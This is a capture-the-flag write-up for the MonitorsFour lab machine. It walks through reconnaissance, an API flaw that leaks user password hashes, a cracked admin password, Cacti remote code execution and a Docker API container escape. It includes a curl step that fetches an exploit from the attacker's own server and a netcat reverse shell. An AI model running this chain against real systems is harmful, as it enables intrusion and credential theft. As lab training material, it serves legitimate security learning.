MonitorsFour
Information Gathering
> nmap 10.129.17.45 -sCV -oV -o htb/MonitorsFour/nmap -p-
| port | service |
|---|---|
| 80 | http/nginx |
| 5985 | http/Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |
Port 5985
The root of the website is a 404 page. Running dirsearch showed a few 403 errors but nothing accessible
Port 80
subdomains:
- cacti.monitorsfour.htb
Directories found using dirsearch:
- /contact
- /login
- /user
- /static
- /views
In the login page source code we can see that it makes a POST request to /api/v1/auth.
Trying to access these directories from both port 80 and port 5985 return nothing. Let’s see what the forgot password portion is using for the API.
As expected, its using the same API. This time its using /api/v1/reset to reset a user’s password.
From here, it might be best to open Burp Suite repeater and view server responses.
cacti
- Version 1.2.28 vulnerable to CVE-2025-24367 which allows authenticated users to execute arbitrary PHP scripts.
- /cacti/README.md
- /cacti/links.php
- /cacti/LICENSE
- /cacti/docs
- /cacti/CHANGELOG
- /cacti/about.php
Exploitation of this later…
Exploitation
In Burpsuite, I try different things such a test different methods of /api/v1/users ie. POST PUT etc.
I want to poke at /api/v1/users first so I can get a list of users, reset a user password or add a new user. The big clue here is that it is missing a token. Adding this in the content section says that the token is still missing. Making the request with GET /api/v1/users?token=meow we get a different response that the token is invalid.
The request, GET /api/v1/users?token=0, returns a list of users, emails, password hashes and other user information. In this list we see the admin’s email and password hash. I will try to crack the admin pass; if that does not work we will try other user’s passwords and hope that one of them has a bad password.
| id | username | password | role | token | |
|---|---|---|---|---|---|
| 2 | admin | [email protected] | 56b32eb43e6f15395f6c46c1c9e1cd36 | super user | 8024b78f83f102da4f |
Luckily, the admin had a very bad password! -> wonderful1
- This was cracked using crackstation.net
- Using this password we can login into the web portal.
First thing that jumps out to me in this portal is that we can generate an API key. (This ends up not being important haha)
Doing the boring stuff and reading the Changelog I see they mention they migrated their infrastructure to Windows and Docker Desktop 4.44.2.
- Sure enough! -> “critical vulnerability known as CVE-2025-9074, which allows local running Linux containers to access the Docker Engine API without authentication.” – good thing I read that!
- So it seems that the host is Windows and it is running a docker container where the website is running and hosted on port 80.
After poking at it with some CVE PoCs and reading about the vulnerability – it seems we first need access to the local net of the container and host machine. After having a foothold on the container, I think we can escape the container using this CVE.
- The website is running PHP, maybe we can get a shell…
Pivoting to the cacti subdomain we see a login page. ‘admin’ username doesn’t work but the username ‘marcus’ with the same password does get us logged in.
- Now that we are authenticated we can use CVE-2025-24367. (Found earlier by getting the version of cacti)
After getting a shell with that CVE we can try the exploit in Docker Hub that we found earlier.
- But first, the user flag is at
/home/marcus/user.txt
We can move the PoC to the remote docker container by hosting a python http server and use curl -O <our ip>:<port>/exploit.c to /tmp on the target.
Then, we point the exploit to 192.168.65.7:2375. We can get this address and port number by running deepce in the container. It looks like there is an issue with stdout and the display doesn’t work properly. I will set up a netcat instance and try to get a reverse shell through the exploit. This works and whoami returns root. Not sure what we are. I think we are a new docker container. (we are)
hostname on ww-data@821fbd6a43fa is 821fbd6a43fa after running the exploit the hostname of the shell is: 1fa179f5a2c3
Once having root on this new container from the exploit we have access to hostc. This is the main file system of the host. We can find the root flag in hostc/Users/Administrator/Desktop/root.txt